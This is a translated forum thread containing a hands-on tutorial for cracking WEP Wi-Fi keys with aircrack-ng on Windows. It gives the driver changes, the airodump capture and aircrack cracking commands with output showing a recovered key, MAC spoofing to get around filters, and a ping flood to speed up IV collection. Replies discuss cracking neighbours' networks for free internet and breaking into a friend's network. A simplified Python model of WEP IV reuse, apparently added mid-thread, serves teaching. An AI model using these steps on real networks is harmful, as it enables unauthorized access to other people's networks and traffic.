Batsup

[WiFi] WEP Security crack


Translated from

http://www.tazforum.thetazzone.com/viewtopic.php?t=2069

On the aircrack website I found a video tutorial that apparently covers what is in this tutorial.

VIDEO TUTORIAL

Cracking WEP with Windows XP Pro SP2

What is WEP:

Wired Equivalent Privacy (WEP) is often considered a protocol that protects wireless transmission 100%, even though that is not true.

As the name implies, WEP was designed so that wireless transmission would have the same security as a LAN, which is almost impossible.

A LAN is inherently more secure than a WLAN because of physical and location constraints. An attacker who wants data from a LAN has to be connected to the network, which is much easier to prevent than on a WLAN.

WEP works at the lower layers of the OSI model, specifically layers 1 and 2, so it does not provide complete security for the data transfer.

WEP can provide a level of security between a WLAN client and an access point, AP (Infrastructure), or between two clients (Ad Hoc).

WEP standards:

WEP is commonly used as 64-bit or 128-bit encryption. These are sometimes called 40-bit or 104-bit because each packet is encrypted with an RC4 cipher stream that is generated by an RC4 key. This key is 64 bits, but the WEP key is 40 bits + a 24-bit initialization vector (IV), which is why the WEP key is sometimes regarded as 40-bit.

The resulting cipher is XOR'd with the plaintext data to encrypt the whole packet. To decrypt the packet, the WEP key is used to generate an identical key stream at the other end to decrypt the whole packet, but more on that later; I will also explain IVs in more detail later.

WEP flaws:

I have heard everyone say that WEP is easily broken and should not be used, that it can be broken in 10 minutes and so on, but why is that?

Well, my opinion is that WEP is bad for these reasons:

1) Initialization vectors are reused with encrypted packets. Because the IV is only 24 bits long, it is only a matter of time before one is used again. This, and the fact that you can have 50+ clients using the same WEP key, only increases the chance of IV reuse.

The IV is sent with the encrypted part of the packet. Reusing any element of an encryption scheme is always a fundamental flaw in that encryption, and because the IV is not otherwise encrypted, this is a major weakness of WEP.

The more RC4 cipher streams and the more IVs are decrypted, the closer we are to discovering the WEP key.

That is the basis of breaking WEP.

2) The algorithm used to encrypt the WEP hash is not intended for encryption. The original purpose of the Cyclic Redundancy Check (CRC-32) was to detect transmission errors, not to encrypt.

3) The biggest flaw, in my opinion, is the mass use of the WEP key.

Everything that connects to one AP needs the same WEP key, so all the resulting traffic will use that same WEP key.

One less obvious side effect shows up when it comes to network administration. If you have 60 clients and they all use the same key, do you really want to change it regularly.... it is easier to leave it as it is.

Wireless standards:

The IEEE defined a specification for wireless transmission in 1997. The protocol they published is the 802.11 standard.

Today's 802.11 has many different variations for wireless transmission. The most common are:

1) 802.11 - this specifies that wireless transmission will use the 2.4GHz frequency using FHSS or DSSS. FHSS is a protocol where the transmission 'hops' across predefined frequencies and is often used to reduce noise in the transmission. DSSS is also a protocol used to reduce noise ...

I SKIPPED VARIOUS CHATTER HERE AND WILL JUMP STRAIGHT TO THE GUIDE ON HOW TO CRACK IT

by combining the signal with a higher data rate bit sequence (commonly called a chipping code) which separates the data up in to a logical sequence and attaches a form of CRC to the packet before transmitting.

2) 802.11a – this provides data transmission in the 5GHz band at a rate of anything up to 54Mbps. Unlike the original 802.11 specification this uses Orthogonal Frequency Division Multiplexing (OFDM) to encode the traffic instead of FHSS or DSSS. OFDM is a method of transmitting digital data by splitting it up in to smaller ‘chunks’ and transmitting them at the same time but on different frequencies, which is why the data transfer rate is quite good.

3) 802.11b – came along in 1999 with the intention of allowing wireless functionality to be similar to that provided by Ethernet. It transmits data in the 2.4GHz band at 11Mbps using DSSS only. Is sometimes called Wi-Fi.

4) 802.11g – this works in the 2.4 GHz band at a rate of 20Mbps or more and came along in 2003. It uses OFDM like 802.11a and transmits data in a very similar way. However unlike 802.11a it is backward compatible with 802.11b.

A point worth noting here is if you have an 802.11b Wireless Adaptor you will not be able to receive 802.11g traffic. If you do want to get in to WEP cracking it is well worth your while investing in a dual band card. I will talk about Wireless Adaptors more later on.

How do we crack WEP:

Well cracking WEP is fairly easy to understand if you have followed what I explained above. We briefly touched on IV’s and WEP encryption and how they tie in together. To put it very simply, if you can decipher the IV algorithm you can decrypt or extract the WEP key.

As I stated before WEP very kindly transmits the IV in clear, so if we can run a mathematical equation against it we can find and decipher the RC4 stream that encrypted the whole packet in the first place.

The WEP ‘key’ is the missing value [key] from this mathematical equation. Remember the AP or the client has this key to use when decrypting the packet and is what we must find by running a complicated algorithm against the encrypted packet.

If you think about it like this it may become clearer:

You have an algorithm that is produced by concatenating a randomly generated 24 bit IV with your WEP Key – You also have an RC4 Key stream - the two are then ‘hashed’ together to encrypt the packet.

The IV is the hub of the whole process as this is the only thing that has used your WEP key. If we run a statistical analysis against the IV to try and decrypt the packet, we can find the key used at the beginning of the process.

When you try to decrypt them, every time you crack a piece of the algorithm the corresponding plain text part of the packet is revealed, once the whole packet is decrypted you know the algorithm used to encrypt that particular packet – A crude way of describing it but as simple as I can make it.

Any attacker can passively collect encrypted data, after a while due to the limitations explained earlier; two IV’s that are the same will be collected. If two packets with the same IV are XOR’d, an XOR of the plain text data can be revealed. This XOR can then be used to infer data about the contents of the data packets.

The more identical IV’s collected the more plain text data can be revealed. Once all the plain text of a data packet is known, it will also be known for all data packets using the same IV.

So before any transmission occurs WEP combines the keystream with the payload using an XOR process, which produces ciphertext (data that has been encrypted). WEP includes the IV in clear in the first few bytes of the frame. The receiving AP / Client uses this IV along with the shared secret key (Your WEP Key) to decrypt the payload of the frame.

XOR is a mathematical algorithm which I am not even going to attempt to explain. This site explains it very well though:
http://mathworld.wolfram.com/XOR.html


So in short – the more identical IV’s we can get the more plain text data we can reveal and the closer we get to obtaining the key used to encrypt the data in the first place.

As it is not pre-determined when we are going to receive identical IV’s it is impossible to say how many IV’s need to be collected but more about that later.

Software used:

For this attack we will use aircrack-ng for Windows, which you can find here:

http://tinyshell.be/aircrackng/wiki/index.php?title=Aircrack-ng

Also download cygwin1.dll there and copy it into the same directory as Aircrack-ng.

One copy of cygwin1.dll is already in Aircrack-ng, but it is outdated.

peek.dll and peek5.dll are also needed in the Aircrack directory. They are here:

http://tinyshell.be/aircrackng/wiki/index.php?title=Links

If you download Winaircrack, which is the GUI version of aircrack that I use here, put peek.dll and peek5.dll where you have aircrack.

Once you have downloaded it, you have the option of copying the path to aircrack into your PATH system variable so that you do not have to CD into aircrack's bin directory every time.

How to do it:

Right-click My Computer > Properties > Advanced > Environment Variables > under System Variables select PATH > Edit > enter the path to bin, for example

C:\Documents and Settings\Nokia\Desktop\aircrack-ng-0.3-win\aircrack-ng-0.3-win\bin

and separate this path from the existing ones with a semicolon ;

You also need to pick a new driver for your WiFi card at Wild Packets.

http://www.wildpackets.com/

There is a bit of a problem here with the type of your WiFi card; some simply cannot be used to crack WEP...

You should now have:

Aircrack-ng

Cygwin1.dll – in the same directory as Aircrack

Peek.dll and Peek5.sys in the same directory as Aircrack

The driver from Wild Packets for your WiFi card

aircrack-ng added to PATH

A WiFi card that works with Aircrack

What now?

Now we need to install the new driver for your card.

**Warning - the following procedure will overwrite your original drivers, so back them up.**

!!!The new driver will not let you connect to an AP and get on the internet!!!

99% of original drivers are made so that your card will not accept any protocol it does not support. The Peek driver puts your card into promiscuous mode, which lets you ||'sniff'; translate that one yourselves|| all the protocols it can.

To install, open Device Manager and right-click your WiFi card > Update Driver > Install from a Specific Location > Don't search, I will choose the driver to install > Have Disk > find the downloaded driver > double click.

Windows may pop up a window saying that the driver is not signed. If that happens, click Continue.

Now we are ready to crack WEP!

Cracking WEP:

Cracking WEP is now a fairly simple matter, because all the hard work has already been done for us by Chris Devine, who programmed the excellent Aircrack. All we need to do is collect the data and run the program. If you have any questions about Aircrack, an excellent place to post them is the Netstumbler Linux Forum, because Chris goes there fairly often. Alternatively you could email him at [at] iie [dot] cnam [dot] fr - but whether he will reply or not, I don't know. He definitely won't answer stupid questions - use the forum for those.

Airodump

So open a command prompt and type Airodump - or, if you did not add the path to bin to PATH, you have to CD into bin.

A new window opens which finds all installed wifi cards, gives them a numeric label and displays the following:

usage: airodump <nic index> <nic type> <channel(s)> <output prefix> [ivs only flag]

Known network adapters:

14  NETGEAR WG511T 54 Mbps Wireless PC Card
22  NETGEAR WAG511 802.11a/b/g Dual Band Wireless PC Card

Network interface index number  ->

Select the wifi card you want to use:

Network interface index number  -> 22

Then you have to enter your card's chipset:

 Interface types:  'o' = HermesI/Realtek
                   'a' = Aironet/Atheros

 Network interface type (o/a)  ->

I use Atheros, so I enter 'a':

Network interface type (o/a)  -> a

Then we have to enter the channel on which we want to scan traffic:

Channel(s): 1 to 14, 0 = all  ->

The USA uses channels 1 - 11 and Europe up to channel 14. Channel 11 is the most used in the USA, so I will enter channel 11. If you want to scan all channels, enter 0.

Translator's note: I think channel 6 is the most used in Europe

I will use channel 11:

Channel(s): 1 to 14, 0 = all  -> 11

Now you have to choose how you want to save the captured data:

(note: if you specify the same output prefix, airodump will resume the capture session by appending data to the existing capture file)

Output filename prefix        ->

If you enter a name that has already been used, the newly captured data will be appended to the previous data - which is an excellent feature that makes your work much easier!

Output filename prefix        ->WEP1

Now we have to specify whether we want to save only the IVs or all packets.

(note: to save space and only store the captured WEP IVs, press y.The resulting capture file will only be useful for WEP cracking)

Only write WEP IVs (y/n)      ->

Since we know that only IVs are needed to crack WEP, we can answer yes. The resulting file will be saved as *.IVS.

Only write WEP IVs (y/n)      -> y

So now we have entered everything needed; what happens next:


BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

00:09:5B:FD:C6:52   10        3        6  11  54  OPN   HOMEWIRELESS
00:30:F1:F5:A1:35   60      359     1234  11  54  WEP   Stuart

BSSID              STATION            PWR  Packets  ESSID

00:09:5B:FD:C6:52  00:09:5B:B6:1D:2A   17        6  HOMEWIRELESS
00:30:F1:F5:A1:35  00:09:5B:84:A6:DF   87     1793  Stuart

This is the output of a successful Airodump start

BSSID = MAC address of the Access Point

PWR = Signal strength

BEACONS = Every AP sends around 10 beacons per second - these are not encrypted and are of no use to us if we want to crack WEP. They basically say 'I am an AP!! Come and connect to me' :D

DATA = This is what we are interested in. DATA packets are the IVs we need.

ENC = Encryption - WEP / WPA / OPEN etc

ESSID = Name of the wireless network. The AP does not always broadcast it, but we need it to be able to connect to the AP.

The second part lists all the clients that are connected to the AP. Write down their MAC addresses somewhere.

Some APs have a MAC address filter. This is a table of MAC addresses that are allowed on the AP - if you try to connect to an AP that has a MAC address filter, the AP checks whether it has your MAC address in its list of allowed addresses. If you are not on it, then even if you have the correct WEP key you will not connect to the AP. You will also leave some info about yourself in the log. This is a very useful part of Airodump, in that it tells us that we have to change our MAC address when connecting to the AP.

[[change your MAC ad.. in the original it was spoof your MAC ad.. spoof means to make fun of someone. I assume that in hacker slang it means to change your MA.]]

DATA:

As I said, it is impossible to say how many IVs are needed to crack a WEP key. The more you have, the greater the chance of cracking the WEP key. By trial and error I found that I can crack a 40-bit WEP key in a few seconds with roughly 250,000 – 400,00 IVs. But it is also possible with fewer IVs; it is simply different every time.

For a 104-bit WEP key at least 2000000 IVs are needed, and usually even more. The smallest number of IVs with which I managed to crack a 104-bit WEP key was 710,325 and it took 4 minutes and 31 seconds, but mostly I needed more than 2 million IVs.

An excellent feature of Airodump is the already mentioned appending to existing IV files. If you collected 500 000 IVs and unsuccessfully tried to crack 64-bit, simply run Airodump again and use the same IV file! All new IVs will be added to those already saved, so you do not have to collect all those IVs again.

Now collect the required number of IVs.

Aircrack-ng

When you decide you have enough IVs, press CTRL + C. I collected 413,994 IVs.

Now you have a blank cmd window open, so type Aircrack-ng there (or get into the Air. folder using CD)

Now you will see a listing of what Aircrack can do.

 Common options:

     -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
     -e <essid> : target selection: network identifier
     -b <bssid> : target selection: access point's MAC
     -q         : enable quiet mode (no status output)
     -w <words> : path to a dictionary file

 Static WEP cracking options:

     -c         : search alpha-numeric characters only
     -t         : search binary coded decimal chr only
     -d <start> : debug - specify beginning of the key
     -m <maddr> : MAC address to filter usable packets
     -n <nbits> : WEP key length: 64 / 128 / 152 / 256
     -i <index> : WEP key index (1 to 4), default: any
     -f <fudge> : bruteforce fudge factor,  default: 2
     -k <korek> : disable one attack method  (1 to 17)
     -x         : do bruteforce the  last two keybytes
     -y         : experimental  single bruteforce mode

 Aircrack-ng 0.3 - (C) 2006 Thomas d'Otreppe
 Original work: Christophe Devine
 http://www.aircrack-ng.org

 usage: aircrack-ng [options] <.cap / .ivs file(s)>

So now we type the following command into Aircrack:

C:\Docu~\nokia>aircrack-ng -n 64 WEP1.ivs

We use the -n 64 option because we want to crack a 64-bit WEP key.

We can also use the -f option, which is the 'fudge' factor switch.

The programmer's words:

"By default, this parameter [fudge factor] is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the brute force level: cracking will take more time, but with a higher likelihood of success."

So if you do not enjoy cracking without brute force, you can try the -f 5 option.

If you have forgotten where you saved the Airodump output, by default it is saved here:

C:\Documents and Settings\%User Name%

If you saved only IVs it will be an .IVS file, otherwise it will be a .cap file.

Our scan was done on only one network, so Aircrack will crack only those IVs; if you have more than one network you must use the -m option to give the BSSID of the wifi network you want to crack.

The output of our commands is this:

                                     Aircrack-ng 0.3


                     [00:00:00] Tested 1231 keys (got 413994 IVs)

  KB    depth   byte(vote)
   0    0/  4   A6(  68) 82(  40) EE(  20) E4(  15) 18(   5) 23(   5) 04(   3)
   1    0/  3   22(  75) 52(  19) 43(  15) 5A(  13) 21(   8) 8A(   5) B2(   4)
   2    0/  1   04(  76) 33(   8) 8B(   5) C8(   5) 47(   0) 62(   0) 63(   0)
   3    0/  1   09( 106) FB(  15) ED(  12) 58(  12) F0(  11) 29(   7) C8(   5)
   4    0/  1   EB( 153) 19(  27) 0E(  15) 38(  15) B8(  13) E0(  10) DC(   9)

                        KEY FOUND! [ A6:22:04:09:EB ]

So here is your 40-bit WEP key: A6:22:04:09:EB.

With 413994 IVs it took Aircrack 1 second to crack this key. Now you can see how good Aircrack is. With 250,000 IVs it would have taken only a few seconds longer, but it is definitely safer to collect more IVs.

As I said, the programmer did all the hard work for us; the only thing we have to do is say what we want done. For end users, WEP cracking is not a hard thing to carry out in any respect (the only thing we have to do is tell Aircrack what to do), unless of course you want to write your own program to crack a WEP key.

FAQ and answers to questions


Troubleshooting:

Common problems are:

Incompatible Wireless Card.

90% of my students who come to me complaining they can’t crack WEP and that Aircrack does not work are failing because they do not have a compatible Wireless Adaptor.
If you are giving the commands that I am giving here, or get an error message when installing the driver I can almost guarantee you that your card is not compatible. It is possible to flash the firmware of some Prism2 cards; this page helps you do this:
http://tinyshell.be/aircrackng/wiki/index.php?title=Prism2_flashing

Can’t receive DATA / IV’s with Airodump:

To receive IV’s from an AP there has to be a client associated with it that is sending / receiving traffic. If you are not receiving IV’s the most likely causes of this are that there are no associated clients or you are too far away from the AP. As far as I know Aireplay does not work with Windows so you will have to use a Packet Injection application of your choosing. I will cover this in Part 2.

Finally, if you are just plain unlucky you may just not be able to crack the WEP with the IV’s you have. If this happens the only option is to start from the beginning again.

If you can't crack the 64 bit WEP collect more IV’s and try doing it as a 104 bit WEP key.

My thanks go to Chris Devine, KoreK and all who helped him, for writing such a helpful application and to Thomas d'Otreppe who I believe imported it on to Windows?


FAQ

The following FAQ has been put together from questions in this thread. Additionally the following link was found by Moo and has proved very helpful:

http://www.wirelessdefence.org/Contents/AircrackORIGINAL.html

Can we ask that you look through the FAQ in that link and this FAQ before you post questions here, thanks

Q. I can't get the Wild Packet drivers to work for my xxxxx wireless card. After I install it says the card will not work properly now?

A. You won’t be able to connect to the internet / AP in the conventional way after you install the Wild Packet drivers - these drivers place your card in a promiscuous mode to enable you to receive traffic not destined for you.

If you fire Airodump up after installing the drivers it should work, if they have been installed correctly. There are two versions of the drivers. If it does not work then the drivers either haven’t been installed properly, you have installed the wrong version, or they are incompatible with your card.

After you have finished go to your device manager in your control panel and 'roll back' the driver to revert back to the original one so you can get normal connectivity.
____________________________________________________________

Q. Can I have two different wireless cards installed, one for general internet surfing and another with the Wild Packet drivers installed for penetration testing?

A. Yes, this is a good solution; I do it most of the time when I need internet connectivity and a passive connection at the same time. If you have more than one PCMCIA slot on your laptop use the same slot for each card - this will prevent you having to constantly reinstall the relevant drivers!
____________________________________________________________

Q. When I load Airodump I get the following error "LoadLibrary(Peek.dll) failed, make sure this file is present in the current directory." what does this mean?

A. You will need to get the peek.dll and peek5.sys files and put them in the same directory as Aircrack.

The easiest way to get them is to go here:
http://tinyshell.be/aircrackng/wiki/index.php?title=Links
and download Winaircrack - which is a GUI version of Aircrack - copy and paste peek.dll and peek5.sys in to your directory.

You should have added cygwin1.dll, peek.dll and peek5.sys in to your directory before starting Airodump/Aircrack
____________________________________________________________

Q. When I click on (airdecap-ng, arpforge-ng.....), they quickly open and close?

A. Read all of the paper......specifically the part about adding them to your path – once you have done this double clicking on them won't work any more.
____________________________________________________________

Q. I have it running fine, but the IV collection is really slow, can I speed it up at all?

A. If the wireless network does not have many clients, then IV collection will be very slow. If this is your own network open up a command prompt and type:

ping "ip address of AP" -l 65500 -t (That’s a small L not a |)

This will send a constant stream of ICMP packets 65500B big to the AP which should generate a good stream of IV's. This will only work if you are already associated with the AP and is for use to test YOUR OWN WEP KEY; you cannot use it against somebody else's AP until you have associated with it.
____________________________________________________________

Q. How do I use Packet Injection to speed up collection of IV’s? / I can’t seem to get packet injection program xxxxxx to work properly, can you help?

A. Unfortunately Packet Injection is outside the scope of this tutorial and may be covered in a future one. For the time being you will have to do some research on Google.

btw I translated this on another forum that died, so I am putting the original translation thread here

http://andrewsm.net/psp/forum/showthread.php?t=4460

anyone can crack WEP following this guide; the only problem is that there are no Wild Packets drivers for all WiFi cards

please keep any negative feedback to yourselves; in this thread I would like to talk about how to crack WEP security, not about whether it is right or not...

nothing? no feedback? well, still better than people swearing at me :D :D if this comes in handy for anyone, make me happy by posting here whether it worked for you ;)
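
Added example (not part of the original post or of aircrack-ng): a simplified Python model of WEP encapsulation that shows why the cleartext 24-bit IV described in the post is a design weakness. Frames that share an IV share a keystream, and the birthday bound shows how few frames it takes before that happens. The key, IVs and plaintexts are constructed sample values and the function names are illustrative.

```python
import zlib
from collections import defaultdict
from math import ceil, exp, log, sqrt


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Standard RC4: key scheduling, then n bytes of output keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """Simplified WEP body: IV (clear) | key-id byte | RC4(IV||key) XOR (data | CRC-32 ICV)."""
    if len(iv) != 3:
        raise ValueError("a WEP IV is 24 bits")
    data = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + b"\x00" + xor(data, rc4_keystream(iv + key, len(data)))


def wep_decrypt(frame: bytes, key: bytes) -> bytes:
    iv, body = frame[:3], frame[4:]
    data = xor(body, rc4_keystream(iv + key, len(body)))
    plaintext, icv = data[:-4], data[-4:]
    if zlib.crc32(plaintext).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return plaintext


def frames_by_reused_iv(frames):
    """Audit check: group frames by their cleartext IV, keep IVs seen more than once."""
    groups = defaultdict(list)
    for frame in frames:
        groups[frame[:3]].append(frame)
    return {iv: fs for iv, fs in groups.items() if len(fs) > 1}


def plaintext_xor(frame_a: bytes, frame_b: bytes) -> bytes:
    """Same IV and key give the same keystream, so c1 XOR c2 == p1 XOR p2."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames do not share an IV")
    return xor(frame_a[4:], frame_b[4:])


def iv_collision_probability(n_frames: int, iv_bits: int = 24) -> float:
    """Birthday approximation for random IVs: P(some IV repeats in n_frames)."""
    return 1.0 - exp(-n_frames * (n_frames - 1) / (2.0 * 2 ** iv_bits))


def frames_for_collision(p: float = 0.5, iv_bits: int = 24) -> int:
    """Frames needed before an IV repeat has probability p."""
    return ceil(sqrt(2.0 * 2 ** iv_bits * log(1.0 / (1.0 - p))))


# Constructed sample data: one shared 40-bit key, two frames with the same IV.
KEY = bytes.fromhex("0102030405")
P1 = b"first plaintext!"
P2 = b"second plaintext"
FRAMES = [
    wep_encrypt(b"\x00\x00\x01", KEY, P1),
    wep_encrypt(b"\x00\x00\x02", KEY, b"unrelated frame "),
    wep_encrypt(b"\x00\x00\x01", KEY, P2),
]

if __name__ == "__main__":
    for iv, group in frames_by_reused_iv(FRAMES).items():
        leaked = plaintext_xor(group[0], group[1])[:len(P1)]
        print("IV", iv.hex(), "reused; p1 XOR p2 =", leaked.hex())
        print("knowing p1 gives p2:", xor(leaked, P1))
    print("frames for a 50% chance of an IV repeat:", frames_for_collision(0.5))
```

The fix is not a longer WEP key, since the IV stays 24 bits at either key size; it is moving the network to WPA2 or WPA3.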


unfortunately it really cannot be shortened much, but start by getting the Wild Packets drivers for your wifi card; if you cannot get them you are out of luck and will not crack anything (you have the wrong chip)

you can find them here http://www.wildpackets.com/

if you do not find your card there, there is no point in reading the guide ;)

but the rest is written in the guide....

well, the neighbours have wifi but I only get 53% signal, so I don't know (don't you want to shorten it?)

well, I think it is worth the read. after all, you will be able to have internet at home any time, and that is worth it. It also matters whether their signal is encrypted as WEP or WPI. WPI is much harder to crack and I don't know how to do it... :D

I don't feel like reading the whole thing for nothing... just one question... I guess I also need a wifi card in the PC for this, right?

yes, you need a wifi card in the PC, but not just any ordinary one; special drivers have to be made for it, so if you do not have one, either write your own drivers for it or you are most likely out of luck

try the video tutorial

Are there really only 5 of those special cards? Aren't there other drivers somewhere else? And what about some special graphical program that does everything for us? The guide is not hard, but some nice point-and-click tool that spits out the key would be better :)

Can the MAC address be changed on the PSP?

I don't know of any other website that has those drivers... that doesn't mean there aren't any somewhere

well, a special graphical program.... let's say this way you at least look like more of a pro, right? It's simply not only about you cracking WEP but also about not too many people knowing how to do it :D

So I found something about supported cards

http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

great!

so now, whoever wants to, find out what chip you have and check whether it is on that list.... I will do it too

as for the MAC address... I don't know, maybe there is some homebrew that can handle it, but otherwise I don't know; on a computer it can be done, that I know how to do

EDIT: a website with lots of cards and their chipsets http://www.linux-wlan.org/docs/wlan_adapters.html.gz

there are probably even more here http://linux-wless.passys.nl/query_chipset.php?chipset=Atheros

those sites are for Linux users but the chipsets are listed there too, right ;)

btw I have 2 wifi cards, one with a Marvell chip -> unsupported and another with a Ralink chip -> supported in Linux!!! when I'm in the mood sometime I'll crack WEP ;) and make a video tutorial out of it

EDIT2: if any of you want to crack WPA, I now know how to do it ;) tell me and maybe I'll write something on it, or at least send you a link to some tutorial


Does anyone have this file, please?? I can't find it and the link on aircrack no longer works :cry: I did find and download the peek.dll file, but I don't know whether it works, so if you could throw it in along with peek5.sys I would be very grateful ;)

And one more request. My English is not the best, so at http://www.wildpackets.com/ I did not find drivers for my WiFi card (I couldn't even find out whether it is supported :() I have an "Intel® PRO/Wireless LAN 2100 3A Mini PCI Adapter" in my laptop and would be grateful for an answer on whether my wifi is supported or not, and possibly drivers for it as well. Thank you very much.


as old as my grandmother.. Under Windows it will take a very long time to crack; with airodump and aireplay on Linux it is cracked right away..

.. besides, there are much better guides; I would be curious how much you have actually cracked..

EDIT: and also, someone here apparently cannot tell Windows software from PSP software.. sad.


Hello, I am trying to break the protection on my friend's Wifi network; we made a bet that I won't find it out ....... but that he doesn't have anything complicated .... I found out that he has a WEP key so I followed the procedure that is here .....

http://www.metacafe.com/watch/1106987/how_to_crack_wep_wireless_networks_for_noobs/

I got as far as cmd / the command prompt ..... it shows me this wjutlk.jpg I don't know what next; they write there that for a 128 (or whatever) WEP key it is enough to have 500 000 packets, I have those, so please what next ....

PS: I know it is illegal but he gave me permission to break in, he is a good friend ..... that is not a problem

PS2: THANK YOU FOR ANY HELP AND ADVICE

PS3: here are my collected packets:

http://rapidshare.com/files/181762247/PACKETS.zip.html

This topic is now closed to further replies.
